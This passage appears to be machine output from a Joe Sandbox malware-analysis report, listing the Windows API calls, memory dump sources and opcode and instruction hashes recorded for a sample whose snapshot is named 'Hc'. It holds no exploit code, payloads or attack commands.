                                                                  • Instruction Fuzzy Hash: E8014E326051605ED7646334AC4A7BE67874BC6736F26025EFC15EF6D2DF308D894294
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006258BE,SwapMouseButtons,00000004,?), ref: 006258EF
                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006258BE,SwapMouseButtons,00000004,?), ref: 00625910
                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,006258BE,SwapMouseButtons,00000004,?), ref: 00625932
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: fb19530232d7b53a4ff072efb6b6b81f1d19a16ca7e883ecdf03df321cd071c1
                                                                  • Instruction ID: 7e250eebb7b0698ec59abc7419e45ce0e398b3bd4e86d5ab9ea75a178ddce756
                                                                  • Opcode Fuzzy Hash: fb19530232d7b53a4ff072efb6b6b81f1d19a16ca7e883ecdf03df321cd071c1
                                                                  • Instruction Fuzzy Hash: 3A1170B5910A68FFDB219F64DC40EEE77BAEF00764F104559F806D7210E2319E819B60
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 00633006
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: CALL$bnh
                                                                  • API String ID: 1385522511-432116625
                                                                  • Opcode ID: c96de55cb4d6a75dfd94151f4755a23d127581011d90b25f5853ca718b12b6b8
                                                                  • Instruction ID: 5f201bbdea194a752a97b55931d2d8aabde682e3a77fa6661e0d4ec3e107b6b8
                                                                  • Opcode Fuzzy Hash: c96de55cb4d6a75dfd94151f4755a23d127581011d90b25f5853ca718b12b6b8
                                                                  • Instruction Fuzzy Hash: 6122AC706083029FD754DF14C891A6ABBF3BF88314F24895DF59A8B3A1D771E941CB92
                                                                  APIs
                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0066413B
                                                                    • Part of subcall function 00625851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006255D1,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00625871
                                                                    • Part of subcall function 00623A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00623A76
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                  • String ID: X$`un
                                                                  • API String ID: 779396738-1367622066
                                                                  • Opcode ID: 70954b28f075e037712dea38f952b946b765bd85be04e3cb902886c31b8f0c8a
                                                                  • Instruction ID: ea8762c00bf401a04b960cb72bc8b495499ba93751920acfbb641bb2e97047f3
                                                                  • Opcode Fuzzy Hash: 70954b28f075e037712dea38f952b946b765bd85be04e3cb902886c31b8f0c8a
                                                                  • Instruction Fuzzy Hash: 58219671A006689BCB51DF94D805BEE7BFEAF45304F008019E545B7381DBF89A898F65
                                                                  APIs
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 006409D8
                                                                    • Part of subcall function 00643614: RaiseException.KERNEL32(?,?,?,006409FA,?,00000000,?,?,?,?,?,?,006409FA,00000000,006E9758,00000000), ref: 00643674
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 006409F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                  • String ID: Unknown exception
                                                                  • API String ID: 3476068407-410509341
                                                                  • Opcode ID: 3eb5a73a856a20cb5db91a5390bbf930fbaf32889007658a3f7a409f20ba95be
                                                                  • Instruction ID: 6561499e11bb73b7f41fc8d6c30a2ce0cfea09e51f64fa7f641d74bd05122d37
                                                                  • Opcode Fuzzy Hash: 3eb5a73a856a20cb5db91a5390bbf930fbaf32889007658a3f7a409f20ba95be
                                                                  • Instruction Fuzzy Hash: 38F0223480021DB7EF00BEA4EC02CEE7B6E5E00310B604028BB1497692FB71EA4AC6D4
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006A8D52
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 006A8D59
                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 006A8F3A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                  • String ID:
                                                                  • API String ID: 146820519-0
                                                                  • Opcode ID: 03530255a5f9c1f7545ba664ee7d7e1737686183e682806bf9921ebdd4d65a93
                                                                  • Instruction ID: a6b18bcbb4e28b91a5a77c063f2e0060dd38d3a606f5801084733827b6bc5468
                                                                  • Opcode Fuzzy Hash: 03530255a5f9c1f7545ba664ee7d7e1737686183e682806bf9921ebdd4d65a93
                                                                  • Instruction Fuzzy Hash: DE126A71A083119FC754DF28C484B6ABBE6BF89314F14895DE8898B352DB31ED45CF92
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_strcat
                                                                  • String ID:
                                                                  • API String ID: 306214811-0
                                                                  • Opcode ID: 815ef52218e933e7c7b2df3f724d91fa1608d723bc1a4c16867e7266b258443e
                                                                  • Instruction ID: ffbee7820c3d588ad4fef72524f3e0765a464da182fe86b251d32507c6d46bfc
                                                                  • Opcode Fuzzy Hash: 815ef52218e933e7c7b2df3f724d91fa1608d723bc1a4c16867e7266b258443e
                                                                  • Instruction Fuzzy Hash: F0A15D31600615DFCB18EF18D5D19A9BBA2FF46314B2084ADE84A8F392DB31ED42CF94
                                                                  APIs
                                                                    • Part of subcall function 006261A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00626299
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0063FD36
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0063FD45
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0067FE33
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                  • String ID:
                                                                  • API String ID: 3500052701-0
                                                                  • Opcode ID: c7175b80a36800a5238581b314fa76541972fd7300cf3bef7684249528207aeb
                                                                  • Instruction ID: 6c3567b74c0ff3900a8309e48c39533df8d328c81b5da9e0ffdaaaa4f1792a74
                                                                  • Opcode Fuzzy Hash: c7175b80a36800a5238581b314fa76541972fd7300cf3bef7684249528207aeb
                                                                  • Instruction Fuzzy Hash: 4F31D4B1900354AFEB32CF248895BE6BBEEAF02308F1044AEE5DD57242D7741A85CB51
                                                                  APIs
                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,006597BA,FF8BC369,00000000,00000002,00000000), ref: 00659744
                                                                  • GetLastError.KERNEL32(?,006597BA,FF8BC369,00000000,00000002,00000000,?,00655ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00646F41), ref: 0065974E
                                                                  • __dosmaperr.LIBCMT ref: 00659755
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 2336955059-0
                                                                  • Opcode ID: 02d3abb08245d20526091b7718db20838030d82b4a4748c856e5bfbc9d43ad37
                                                                  • Instruction ID: 6776091a49230b2bbcf8106123b734cf001f909b3a8057d144cc8f5d33fe9546
                                                                  • Opcode Fuzzy Hash: 02d3abb08245d20526091b7718db20838030d82b4a4748c856e5bfbc9d43ad37
                                                                  • Instruction Fuzzy Hash: 9801D832620514EBCB159FA9DC058AE7B6BDB89331F25025AFC119B290EB719D419BA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c687b8f4019b33aac1ad34ac3f2c1ef35822b05a5048dbb19031f698e831fed0
                                                                  • Instruction ID: 4d98aa1881ebcb90ba04ef449d4125ae01cf6a8afe2ec802a183c6003833d52a
                                                                  • Opcode Fuzzy Hash: c687b8f4019b33aac1ad34ac3f2c1ef35822b05a5048dbb19031f698e831fed0
                                                                  • Instruction Fuzzy Hash: 0332CD30A00A15DFDB24DF54C881AEEB7B7EF06314F148559F91AAB3A1EB31AD40CB95
                                                                  APIs
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00623A3C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_
                                                                  • String ID:
                                                                  • API String ID: 1144537725-0
                                                                  • Opcode ID: e420c171872c3cf65cf9725fb6d0e3d3930509cfb0f3bc2afb67b29c36706c35
                                                                  • Instruction ID: 50e330eb37cbdfe71093387cd9def407ec5a94a692fdd652721e6498cf36811f
                                                                  • Opcode Fuzzy Hash: e420c171872c3cf65cf9725fb6d0e3d3930509cfb0f3bc2afb67b29c36706c35
                                                                  • Instruction Fuzzy Hash: 463180B1504B219FD320DF24E8947A7BBE9FB49708F00092EE5D987341E775A948CF52
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 0062333D
                                                                    • Part of subcall function 006232E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006232FB
                                                                    • Part of subcall function 006232E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00623312
                                                                    • Part of subcall function 0062338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00623368,?), ref: 006233BB
                                                                    • Part of subcall function 0062338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00623368,?), ref: 006233CE
                                                                    • Part of subcall function 0062338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,006F2418,006F2400,?,?,?,?,?,?,00623368,?), ref: 0062343A
                                                                    • Part of subcall function 0062338B: SetCurrentDirectoryW.KERNEL32(?,00000001,006F2418,?,?,?,?,?,?,?,00623368,?), ref: 006234BB
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00623377
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                  • String ID:
                                                                  • API String ID: 1550534281-0
                                                                  • Opcode ID: 0da375b4facada9ad636e8e81abbca32841740535dca95546a850cb3d4315b9d
                                                                  • Instruction ID: 298fa166255a34e65bf7fbd7bdd002969414f1423c2bcff6e3b809ed67154d1f
                                                                  • Opcode Fuzzy Hash: 0da375b4facada9ad636e8e81abbca32841740535dca95546a850cb3d4315b9d
                                                                  • Instruction Fuzzy Hash: 48F0B4B35147969FD300AF74FC1BB743793A700749F001819B505892E2DBB98251CF04
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleSleep
                                                                  • String ID:
                                                                  • API String ID: 252777609-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: f0a47c2a33779cc54e3ffdf088738d89308fd9b6213c77b015fde11e56add580
                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: 4131D271A00115DFE718DF58D480AA9FBB6FB99700B2486A9E509CB352D732EDC1CBC0
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0062CEEE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID:
                                                                  • API String ID: 1385522511-0
                                                                  • Opcode ID: 1385b5f431335b5467c49ac748a5d5d13223566c0d53e5cf733a1dcb29b76504
                                                                  • Instruction ID: 47809c1969fd7ea552ba946c06a7c523b6b7fc30d69fc5f3e2373c5138fedab6
                                                                  • Opcode Fuzzy Hash: 1385b5f431335b5467c49ac748a5d5d13223566c0d53e5cf733a1dcb29b76504
                                                                  • Instruction Fuzzy Hash: CA32BF75A006299FDB24CF58D884ABEBBB7EF45360F15805AE909AF351C734AD41CF90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString
                                                                  • String ID:
                                                                  • API String ID: 2948472770-0
                                                                  • Opcode ID: 32b0662ae96b52a32276bf0f9456e781a10355294ac20dea89542ebfb31aa6d9
                                                                  • Instruction ID: 97fe50135a761188671a966174d8e533906e5764875584d836e9d1a53c3c1215
                                                                  • Opcode Fuzzy Hash: 32b0662ae96b52a32276bf0f9456e781a10355294ac20dea89542ebfb31aa6d9
                                                                  • Instruction Fuzzy Hash: FDD15C74A0420ADFCB14EF98D8819EDBBB6FF59310F144159E915AB391DB30AE42CF94
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b3ad1325e968694f5eefb16356360e8678bcba65e93f824daac0af92b928eb6
                                                                  • Instruction ID: 5f31c263b9ce6ae5b3ca966bb04731ada2cc4a5b865cf5c9debabbd6e08c188a
                                                                  • Opcode Fuzzy Hash: 9b3ad1325e968694f5eefb16356360e8678bcba65e93f824daac0af92b928eb6
                                                                  • Instruction Fuzzy Hash: 6F51B875A00104EFDB10DFA8C855EAA7BE7EF85364F198168E8189B391D771EE42CB50
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0068FCCE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower
                                                                  • String ID:
                                                                  • API String ID: 2358735015-0
                                                                  • Opcode ID: d948ebe49d75273ba79117423293480d985b191d21c4f97931f4304290ee2ee9
                                                                  • Instruction ID: 392ef1a0a608f8512464fd3aee9761f8bb7eafd0988b2455c8b14d2bfb620376
                                                                  • Opcode Fuzzy Hash: d948ebe49d75273ba79117423293480d985b191d21c4f97931f4304290ee2ee9
                                                                  • Instruction Fuzzy Hash: F941D6B2500209AFDB51EFA8C8819EEB7BAEF44314B20463EF616D7251EB70DE05CB50
                                                                  APIs
                                                                    • Part of subcall function 0062663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0062668B,?,?,006262FA,?,00000001,?,?,00000000), ref: 0062664A
                                                                    • Part of subcall function 0062663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0062665C
                                                                    • Part of subcall function 0062663E: FreeLibrary.KERNEL32(00000000,?,?,0062668B,?,?,006262FA,?,00000001,?,?,00000000), ref: 0062666E
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006262FA,?,00000001,?,?,00000000), ref: 006266AB
                                                                    • Part of subcall function 00626607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00665657,?,?,006262FA,?,00000001,?,?,00000000), ref: 00626610
                                                                    • Part of subcall function 00626607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00626622
                                                                    • Part of subcall function 00626607: FreeLibrary.KERNEL32(00000000,?,?,00665657,?,?,006262FA,?,00000001,?,?,00000000), ref: 00626635
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressFreeProc
                                                                  • String ID:
                                                                  • API String ID: 2632591731-0
                                                                  • Opcode ID: 1700b728f2e810cb46e01066aac6b8abda6c1203c78ab73a12cda47f87e8eca1
                                                                  • Instruction ID: cef20644f99e4a5c6fb107c83e17eaf19a3ab56ae8b14bb4d391253e120e1185
                                                                  • Opcode Fuzzy Hash: 1700b728f2e810cb46e01066aac6b8abda6c1203c78ab73a12cda47f87e8eca1
                                                                  • Instruction Fuzzy Hash: 36112772600615AACF54AB20EC02FAD7BA7AF40700F10842DF542AA1C2EF75DA05DF69
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
